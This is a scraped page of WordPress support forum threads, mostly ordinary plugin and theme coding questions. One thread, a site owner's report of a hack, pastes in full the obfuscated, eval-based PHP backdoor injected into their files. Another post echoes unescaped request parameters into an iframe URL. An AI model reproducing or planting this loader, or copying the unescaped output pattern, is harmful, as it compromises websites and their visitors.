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D. Levine on "capcha for comments"

Vejper on "Custom domain on custom post types?"


So I have a custom post type and was wondering if anybody know a good way to have another domain for those? So instead of "mymaindomain.com/posttype/the-post" it would be "seconddomain.com/the-post*?

csimpson on "Help using PHP Request for posting Form to Iframe"


Hi there, firstly any help is much appreciated. In very new to php but love wordpress!

I have searched the web everywhere for a simple solution to my issue but struggled to find a working answer.

In short, i have a form on homepage that allows entry of arrival date, departure date and number of guests. i need the form to post these parameters to an booking system provided by a third party BUT hosted on my website via an iframe - but another page, not the homepage where the form is - MUST EMPHASIZE THAT).

Anyway, i'm almost there! but I am struggling to work out the PHP to display a string of php request functions.

Firstly, my current implementation is showing this code on the page source code (NOTE: iframe delibrately spelt wrong to embed here)

<iBrame name="testframe" src="https://externalurl?siteId=KAYSCLAY&request_locale=en&chainAction=newAvailabilitySearch&29/11/201330/11/201312"></ibrame>

The url aspect of the iframe needs to be as follows:


So I have two problems. I am only showing two dates combined together in my iframe src string, these need to be seperated, and I am also missing two paramters for some uknown reason - number of people parameters.

Below is my code hardcoded on the iframe php page (html/php) and also my form. Any thoughts, help is much appreciated.

<ibrame name="testframe" src="https://externalurl?siteId=KAYSCLAY&request_locale=en&chainAction=newAvailabilitySearch<?php echo ''.$_REQUEST['arrival'].$_REQUEST['departure'].$_REQUEST['numberOfPersons'].$_REQUEST['numberOfChildren']?>"></ibrame>

<form action="/gatehouse-hotel/book-online/" method="get" name="pageform" onsubmit="return validate(this);" target="testframe">

	<div class="FormField Arrival">
		<label for="arrival">Arrival Date</label> <input id="arrival" name="arrival" type="text" /></div>
	<div class="FormField Departure">
		<label for="departure">Departure Date</label> <input id="departure" name="departure" type="text" /></div>
	<div class="FormField NumberOfPersons">
		<label for="numberOfPersons">Adults</label> <select id="numberOfPersons" name="numberOfPersons"><option value="0">0</option><option value="1">1</option><option value="2">2</option><option value="3">3</option><option value="4">4</option><option value="5">5</option></select></div>
	<div class="FormField NumberOfChildren">
		<label for="numberOfChildren">Children</label> <select id="numberOfChildren" name="numberOfChildren"><option value="0">0</option><option value="1">1</option><option value="2">2</option><option value="3">3</option><option value="4">4</option><option value="5">5</option></select></div>

<div class="FormField Submit">
		<input type="submit" value="Book now" /></div>

    <script language="JavaScript">
    function validate(theform) {
    if (theform.domain.value == "") { alert("No domain entered"); return false; }
    return true;

k.daniel.adams on "Add availability to date field"


I'm using the free version of Ninja Forms. My client has a catering event reservation form on their website. They want to limit the date field in the form to allow only certain days based on their fluid catering event availability. This means they need to be able to change availability at whim, and the form should respond.

I'm really not sure how to go about doing this...I was thinking maybe a custom post type to represent confirmed events, and then the form's date picker could poll the database for that custom post type to determine availability.

I know how to create a custom post type. I'm not sure of two things:

1. How to make a post type that allows a user to enter a date as a DATETIME object in PHP, rather than a string? I know posts always have the date they were posted on, I need to be able to choose a date to attach to a post.

2. How to get the datepicker plugin to look at posts of that type, and limit it's selectable dates to dates which are not currently occupied by those posts?

carrucha on "Having trouble initializing wordpress within plugin"


I'm new to Wordpress plugins. I've been asked to improve an existing plugin we have (make it more portable, etc). When installing the plugin and trying to use it the first thing I get is a fatal error about a missing file.

require_once( $_SERVER['DOCUMENT_ROOT'] . '/wp-load.php' );

My install is at /wp, so this immediately fails. I'm having trouble figuring out the correct way to load or initialize wordpress within my plugin to give me access to the database connection, etc. I assumed this would already be working.

From my brief searching on the topic people are recommending NOT including that file, but I haven't seen a good way to do it another way. I've tried these approaches as well.

This fails since ABSPATH is not yet defined.

require_once( ABSPATH . '/wp-load.php' );

This fails since it's not yet defined.


I'm using the latest version and a clean install. The plugin I'm working with is probably a year or two old at least.

Any help would be great.

Libpar on "Moving menu item"


Hi all,
I'm working on the Lightpull plugin, and I've got some menu options that are appearing within the settings page for the plugin itself, and some that appear within the Users menu. I want them all to show in the main plugin settings page - either by moving or linking them.
Before I spend all day on it - is that possible?
Thanks :)

Glur4k on "Create static subpage for a custom post type"



i'm currently developing a plugin and have created a custom post type named "player".

I want to create two static subpages for every player-post.

Currently i've got the following structure:


Is it possible to create the static subpages for every post with given templates without having to create the subpages manually?

So that it looks like:



venenum11 on "Attachment doesn't get post_parent gallery in multisite"


I create a post with image linked to "attachment page" and not to a "media file".

If the post has one single attachment and if i click to this image (image.php):

$metadata = wp_get_attachment_metadata();

works fine, and so i can go to post_parent.

If the post has a gallery, metadata return only link to post (title of the image) and not to post_parent.

For example:

<?php echo get_the_title( $post->post_parent ) ?>

works in image.php only if the post has one image. If the post has a gallery, post_parent display only the title of the attachment, and doesn't display title of post_parent.

Code of metadata in image.php is the default code:


                            $metadata = wp_get_attachment_metadata();
                            printf( __( '<span class="meta-prep meta-prep-entry-date">Published </span> <span class="entry-date"><time class="entry-date" datetime="%1$s">%2$s</time></span> at <a href="%3$s" title="Link to full-size image">%4$s &times; %5$s</a> in <a href="%6$s" title="Return to %7$s" rel="gallery">%8$s</a>.', 'twentytwelve' ),
                                esc_attr( get_the_date( 'c' ) ),
                                esc_html( get_the_date() ),
                                esc_url( wp_get_attachment_url() ),
                                esc_url( get_permalink( $post->post_parent ) ),
                                esc_attr( strip_tags( get_the_title( $post->post_parent ) ) ),
                                get_the_title( $post->post_parent )

Why this happens? There is a solution?

alejodec on "Paginate a list a custom taxonomy description, please help."


Hello there! Sorry for my English, I use google translator.
I have this code in a template showing the description of a taxonomy but as I can not paginate results pages.
Can someone help me? I'd be very grateful.

			$args = array(
				'taxonomy' => 'actor',
			$active_slug = get_query_var('actor');
			$collections = get_categories($args);
			foreach ($collections as $c)
			($c->slug == $active_slug)
				<li><?php print $c->description; ?></li>


mattregister on "get_terms offset working?"


I am trying to display a list of termsfrom my taxonomy "organization" in an unordered list but display them in two columns. This is what I have for my first column:

function print_organizations1() {
$countterms = wp_count_terms( 'organization' );
if($countterms&1) {
$firstcolumn = ( ( ( $countterms - 1) / 2 ) + 1);
} else {
$firstcolumn = ( $countterms  / 2 ); }
$secondcolumn = ( $countterms - $firstcolumn );
$terms = get_terms( 'organization', array('number' => $firstcolumn ));
print '<div class="vcex-bullets vcex-bullets-gray"><ul>';
foreach ( $terms as $term ) {
     // The $term is an object, so we don't need to specify the $taxonomy.
    $term_link = get_term_link( $term );
    // If there was an error, continue to the next term.
    if ( is_wp_error( $term_link ) ) {
    // We successfully got a link. Print it out.
    print '<li><a href="' . esc_url( $term_link ) . '">' . $term->name . '</a></li>';
print '</ul></div>';
add_shortcode('print-organizations1', 'print_organizations1');

That works perfectly. It figures out how many is in the first half of the list and uses that number of terms to display. When I try to make the second column is where I am getting lost. I try to offset the list by the number of terms in the first column.

function print_organizations2() {
$countterms = wp_count_terms( 'organization' );
if($countterms&1) {
$firstcolumn = ( ( ( $countterms - 1) / 2 ) + 1);
} else {
$firstcolumn = ( $countterms  / 2 ); }
$secondcolumn = ( $countterms - $firstcolumn );
$terms = get_terms( 'organization', array('offset' => $firstcolumn ));
print '<div class="vcex-bullets vcex-bullets-gray"><ul>';
foreach ( $terms as $term ) {
     // The $term is an object, so we don't need to specify the $taxonomy.
    $term_link = get_term_link( $term );
    // If there was an error, continue to the next term.
    if ( is_wp_error( $term_link ) ) {
    // We successfully got a link. Print it out.
    print '<li><a href="' . esc_url( $term_link ) . '">' . $term->name . '</a></li>';
print '</ul></div>';
add_shortcode('print-organizations2', 'print_organizations2');

This outputs the entire list. Even when I replace $firstcolumn with a hard number it still displays the whole list. What am I missing? any thoughts?

ikosweb on "Built in gallery+lightbox captions?"


Hello there, I would like to display the title/caption/description whatever that can be done within the built in lightbox that appears when clicking an image in the built in gallery.

Is there a way to enable this?

I don't want to use plugins if everything I need is already built in.


tud46355 on "Plugin shows in IE, but not Firefox or Chrome"


Hello! I have started developing a little plug-in to show all the portfolio items and blog posts a site has in an even fashion. I was creating two seperate plug-ins that function in essentially the same way. The plug-in for blog posts (formatted-blog-posts) is working beautifully in all browsers. The plug-in for portfolio items (formatted-portfolio) is as well, but only in Internet Explorer.

I can't find any css that I'm using that is not compatible, and Firebug and Chrome Debugger are not giving any issues relevant to the plug-in.

Apps and Maps Site
The site is a test site that I manage, filled with content from my University.

Here is the full code. If you find anything useful in it for yourself, feel free to use it. I developed most of this code myself, with help from the codex.
PHP Generation

// I cut out the form functions, and initialization bits.
	// I also cut out the script_enqueue and style_enqueue. These parts are working fine, though, and I have verified it myself.
	function widget ($args, $instance)
     		//Set up the instance variables. I cut that part out...

		// Format the title above the portfolio items
		$before_title = "<div class='formatted-portfolio-title'><h3>";
		$after_title = "</h3></div>";

		// Only display the block if there is a title.
		if (!empty($title))
			echo ($before_title . $title . $after_title);


				$pf_terms = get_categories( 'type=portfolio&taxonomy=department&posts_per_page=' . $postsNum );

			<ul id="filters">
				<li class="current"><div onclick="filter('port-item')" ><?php echo __( 'All', 'responsy' ); ?></div></li>
					foreach( $pf_terms as $pf_term )
						<div onClick="filter('<?php echo $pf_term->name; ?>')" ><?php echo $pf_term->name; ?></div>
			<!-- end FILTERS -->

			<!-- PORTFOLIO -->
			<div id="portfolio" class="portfolio-items">
					$args_portfolio = array( 'post_type' => 'portfolio', 'posts_per_page' => $postsNum );
					$loop_portfolio = new WP_Query( $args_portfolio );

					$pageCount = 0;

					if ( $loop_portfolio->have_posts() )
						while ( $loop_portfolio->have_posts() )

							$terms = get_the_terms( $post->ID, 'department' );
							$categories = '';

							if ( $terms && ! is_wp_error( $terms ) )
								$category_links = array();
								foreach ( $terms as $term )
									$category_links[] = $term->name;
								$categories = join( " ", $category_links );

							$portfolio_item_url = get_permalink();

						<a href="<?php echo $portfolio_item_url; ?>">
							<div class="port-item <?php echo $categories; ?>" id='port-item-<?php echo ($pageCount); ?>'>

									echo "<div class='port-item-container'>";
										if ( '' != get_the_post_thumbnail( $post_id ) )
											$hasThumbs[$pageCount] = true;
											echo "<div class='port-thumb' id='port-thumb-". $pageCount ."'>". get_the_post_thumbnail( $post_id, 'formatted-portfolio-thumb', array( 'alt' => get_the_title(), 'title' => "" )) ."</div>";
											$hasThumbs[$pageCount] = false;
											echo "<div class='port-thumb' id='port-thumb-". $pageCount ."'><img src='" . get_template_directory_uri() . "/img/blog/blog-placeholder.png' alt='". get_the_title() ."'></div>";
										echo ("<div class='port-text' id='port-text-". $pageCount ."'>". get_the_title() ."</div>");
									echo "</div>";

			<!-- end PORTFOLIO -->


		echo $after_widget;

		// For the javascript code, create an array of Booleans
		$thumbs = json_encode ( $hasThumbs );

		// Create a global javascript variable called thumbnails that holds the array.
		<script type="text/javascript">
			var thumbs = <?= $thumbs ?>;

CSS Code:

/* 	The wrapper for the whole widget			*/
.formatted-portfolio-container {

/* 	The container for the title of the widget	*/
.formatted-portfolio-title {
	border-bottom: 1px dotted #888888;

/*	The container wrapping each post 			*/
.port-item {

	margin-top:0px !important;
	margin-bottom:0px !important;

	margin:1% !important;
	padding-top:0px !important;
	padding-bottom:30px !important;

	border-bottom: 1px dotted #888888;


/*	The container for the widget title			*/
.port-text {

/*	The container for the thumbnail of the post	*/
.port-thumb {

.port-item-container {
	top: 50%;
	transform: translateY(-50%);
	-ms-transform: translateY(-50%);
	-webkit-transform: translateY(-50%);

Shrink Code, which shrinks the text to fit in a limited box set in the CSS:

// REQUIRES 'thumbs', which should be passed by the .php code.
	// This is an array of Booleans that indicates whether a post has a featured image or not.

	// When the window loads or is adjusted, fix the text size...
	// so that all of the posts take up the same size.
	window.onload = function() { resizePort ( ); }
	window.onresize = function() { resizePort ( ); }

	// Create a global variable.
	var columns;

	function resizePort ()
		var thumbnails = thumbs;

		// Get the total width of the browser window.
		var availWid = window.innerWidth;

		// Depending on the size available, change the number of columns.
		if ( availWid < 300 && columns != 1 )
			changeClassSize ( 98, 'port-item' );
			columns = 1;
		else if ( availWid < 600 && availWid >= 300 && columns != 2 )
			changeClassSize ( 48, 'port-item' );
			columns = 2;
		else if ( availWid < 900 && availWid >= 600 && columns != 3 )
			changeClassSize ( 31, 'port-item' );
			columns = 3;
		else if ( availWid >= 1200 && columns != 4 )
			changeClassSize ( 23, 'port-item' );
			columns = 4;

		// For each post, fix the text size.
		for (var index = 0; index < thumbnails.length ; index++)
			shrinkPort(index, thumbnails[index]);

	// Adjust the space that each column takes up depending on the size given.
	function changeClassSize( size, className ) {
		var cols = document.getElementsByClassName( className );

		for ( var i = 0 ; i < cols.length ; i++ )
			cols[i].style.width = size + '%' ;

	// Adjust the text so each post takes the same space.
	function shrinkPort(id, hasThumb)
		// Get the individual parts of an individual post.
		var textbox = document.getElementById('port-text-' + id);
		var box = document.getElementById('port-item-' + id);

		// Get the CSS styling of the text of the portfolio item.
		var classSample = getComputedStyle( document.getElementsByClassName('port-text')[0] );

		var maxHeight = parseInt(classSample.maxHeight);
		var paddingTop = parseInt(classSample.paddingTop);
		var paddingBottom = parseInt(classSample.paddingBottom);

		// The max font size of the text. This will only go down from here.
		textbox.style.fontSize = '48px';

		// The amount of space taken up by the title, not including the padding or margin.
		var spaceTaken = textbox.scrollHeight;

		// If the text is too tall (for the CSS rules) or too wide (for the post box) ...
		while ( spaceTaken > maxHeight || textbox.scrollWidth > box.offsetWidth )
			// stop if the text gets too small.
			if (parseInt (textbox.style.fontSize) <= 7)

			// Shrink the text by 1 px and reset the conditional.
			textbox.style.fontSize = parseInt(textbox.style.fontSize) - 1 + 'px';
			spaceTaken = textbox.scrollHeight;

And finally, the filter Script code. When a filter is clicked, all of the portfolio items from the clicked department are shown, while the others are set to 'display:none;'.

function filter ( department )
//		alert (department);

		var allBlocks = document.getElementsByClassName( 'port-item' );

		for ( var i = 0 ; i < allBlocks.length ; i++ )
			allBlocks[i].style.display = 'none' ;
//			alert (allBlocks[i].innerHTML);

		var cols = document.getElementsByClassName( department );

		for ( var i = 0 ; i < cols.length ; i++ )
			cols[i].style.display = 'inline-block' ;
//			alert (cols[i].innerHTML);

I'm sorry for the wall of code, but I have no idea what could be causing this problem. Because of this, I felt I should show all the important bits.

Thanks in advance for any and all help.

tukinu on "Add user page to custom menue page"



I have a custom user management and would like to add a sub menu page to my custom top level menu page, like:
My Plugin
- My plugin users
how can I do this?

Thanks a lot

CplMiller1970 on "Index.php file broken"


I had my site hacked where they screwed my index.php file. I was told to re-load the MYSQL database and re-load it and that should re-create the index.php file....it does not. When you try to bring the site up I get garbage on the screen...please see link

Any help would be appreciated.



Kyle Gilman on "Safer Paypal Plugin Donate Link?"


I just got a scary call from PayPal accusing me of being a pornographer. They were planning to suspend my PayPal account if I didn't remove PayPal from a particular adult website. I started out very confused because I don't have any adult websites. It turns out that a recent PayPal donation for my Video Embed & Thumbnail Generator plugin had originated from what I believe was a click on a Donate link in the WordPress dashboard of an adult website that is using my plugin. The Donate link goes directly to PayPal and shows the adult website as the referrer for the link.

Once I explained the situation and showed him the page in the WordPress plugins database, he was a lot more reasonable, and decided not to suspend my account, but he strongly encouraged me to remove any PayPal links from the plugin itself because if they see more referrers from adult websites I could see some more trouble.

I would like to keep a Donate link in the dashboard because I think users are a lot more likely to click on that than the link in the plugins database or on my own website, but I want to avoid the credit card morality police. What do the rest of you do? Should the donate link be a link to my own site? Or some kind of redirect that removes the referrer?

bogdanUlea on "Hacked code inserted in all the php files from my website"


I have the following problem:
All my .php pages from my website has been hacked. A suspicious code has been inserted on first line of my WordPress website. I have changed all the user access password and database passwords and users and installed a new version (the last version 3.9.1)...It is very strange. The php files from my installation have 0644 rights access on Linux. The hosting is offered by hostmonster.com.....I think is something with their security access. Did somebody had the same issue?

The inserted code is:
<?php $xfsvhcslzb = '%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*25z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%x5c%x7825%x5245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}39]252]y83]273]y72]282#<!%x5c%x7825tj-}!#*<%x5c%x7825nfd>%x5c%x782%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597y]#>n%x5c%x7825<#372]58y]472]37y]672#[#-#Y#-#D#-#W#-#C#-#O#-7]D4]275]D:M8]Df#<%x5cc%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5t%x5c%x7860msvd}+;!>!}%x5c%x78%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)fepdof.)7%x65","%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x285]y31]55]y85]82]y76]62]yqp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825*<(<%x5c%x78e%x5c%x78b%x5c%x7825z)%x5c%x7825bbT-%x5c274]y85]273]y6g]273]y76]271]y7d]252]y74]256]yV%x5c%x7860QUUI&b%x5c%78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%xx7825-#1]#-bubE{h%x5c%5c%x7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bj#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hm5z<jg!)%x5c%x7825z>>2*!%x5cIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782f#56%x75%156%x61"]=1; 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$qscmjmqose=substr($xfsvhcslzb,(32338-22232),(28-21)); if (!function_exists('jqmtqbqims')) { function jqmtqbqims($lobzdwfrxg, $vpssrsjtab) { $qmjbrwxvex = NULL; for($hprwzufgsb=0;$hprwzufgsb<(sizeof($lobzdwfrxg)/2);$hprwzufgsb++) { $qmjbrwxvex .= substr($vpssrsjtab, $lobzdwfrxg[($hprwzufgsb*2)],$lobzdwfrxg[($hprwzufgsb*2)+1]); } return $qmjbrwxvex; };} $qbewuuvtsf="\x20\57\x2a\40\x71\161\x62\143\x6b\144\x78\153\x73\144\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\61\x37\55\x31\70\x30\51\x29\54\x20\143\x68\162\x28\50\x33\63\x33\55\x32\64\x31\51\x29\54\x20\152\x71\155\x74\161\x62\161\x69\155\x73\50\x24\171\x65\142\x79\162\x6e\157\x71\160\x71\54\x24\170\x66\163\x76\150\x63\163\x6c\172\x62\51\x29\51\x3b\40\x2f\52\x20\172\x77\151\x63\162\x6e\161\x6d\141\x77\40\x2a\57\x20"; $qkftatwrqv=substr($xfsvhcslzb,(49095-38982),(47-35)); $qkftatwrqv($qscmjmqose, $qbewuuvtsf, NULL); $qkftatwrqv=$qbewuuvtsf; $qkftatwrqv=(556-435); $xfsvhcslzb=$qkftatwrqv-1; ?>

XtraMark on "Hackers guessed my login ID and now I am locked out"


Wordfence was able to thwart the attempted logins to admin and test.
Now the hackers have guessed my login and I am locked out.
How do I get back in to change my login without letting the hackers in?

coverfield on "Disable "add new" post to anyone who has one published or in waiting the revie"


Hello everyone, I wanted to know if there is a possibility to add a single post to a contributor, and be prevented from adding another one.

For example, if a contributor just recorded adds an article, which will then be moderated, and sent for review, I wish that he be prevented from adding another (should no longer appear on the "add new"), but may still change the one you just wrote, and re-submit it for review, but can not add another one.

In short, every contributor can publish only one (1) item.

I hope I explained and thank you in advance.

gpalowitch on "next_post_link and previous_post_link modification"



First off, thanks for taking the time to read this and I hope you can help.

I am working on a website that has many portfolios which are spread within 4 different portfolio types. On each page for a single portfolio, the website's theme, Galao supported by themejug, calls the next_post_link and previous_post_link function from the wp-includes/link-template.php file. When I click the link to move to the next or previous portfolio I will eventually get to a portfolio of another portfolio type. With all that said, I am wondering how I would go about modifying the next_post_link and previous_post_link functions or any other functions they call so that the next or previous portfolios must be within the same portfolio type?

Once again thanks for your time,


javawpscript on "Redesigning My Search Results"


I have got the Twenty Ten WordPress Theme but I don't want to use the current search design. I have found out if I do a normal search for example cheese (?s=cheese) but if I do (news?s=cheese) then it will search that parent page and child pages. I was wondering if there was anyway to get the search looking like the bbc.co.uk search design. I know that it might need editing in the Theme Editor and that is fine!

PS: I use a Multisite with Only 1 Site.

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